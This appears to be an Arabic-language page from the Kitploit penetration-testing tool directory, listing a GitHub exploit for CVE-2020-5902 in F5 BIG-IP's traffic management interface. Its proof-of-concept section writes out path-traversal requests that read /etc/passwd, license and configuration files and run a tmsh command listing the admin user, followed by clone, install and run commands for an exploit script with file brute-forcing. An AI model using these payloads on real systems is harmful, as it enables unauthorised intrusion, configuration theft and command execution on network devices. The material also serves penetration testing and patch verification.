Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-5902 — في إصدارات BIG-IP 15.0.0-15.1.0.3، و14.1.0-14.1.2.5، و13.1.0-13.1.3.3، و12.1.0-12.1.5.1، و11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، والتي يشار إليها أيضًا باسم أداة التهيئة، على ثغرة أمنية لتنفيذ التعليمات البرمجية عن بُعد (RCE) في صفحات غير معلنة. | Kitploit
أدوات/GitHubGitHub/amitlttwo/cve-2020-5902
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubamitlttwo/cve-2020-5902

CVE-2020-5902

في إصدارات BIG-IP 15.0.0-15.1.0.3، و14.1.0-14.1.2.5، و13.1.0-13.1.3.3، و12.1.0-12.1.5.1، و11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، والتي يشار إليها أيضًا باسم أداة التهيئة، على ثغرة أمنية لتنفيذ التعليمات البرمجية عن بُعد (RCE) في صفحات غير معلنة.

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-5902

في الإصدارات BIG-IP 15.0.0-15.1.0.3 و14.1.0-14.1.2.5 و13.1.0-13.1.3.3 و12.1.0-12.1.5.1 و11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، التي يشار إليها أيضًا بأداة التهيئة، على ثغرة أمنية لتنفيذ التعليمات البرمجية عن بُعد (RCE) في صفحات غير معلنة.

إثبات المفهوم

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

الاستخدام والتثبيت

root@kitploit:~
git clone https://github.com/yasserjanah/CVE-2020-5902
root@kitploit:~
cd CVE-2020-5902/
root@kitploit:~
pip3 install -r requirements.txt
root@kitploit:~
python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b to brute force files from a wordlist
root@kitploit:~
python3 exploit-CVE-2020-5902.py -ip <IP> -b
تنزيل الأداة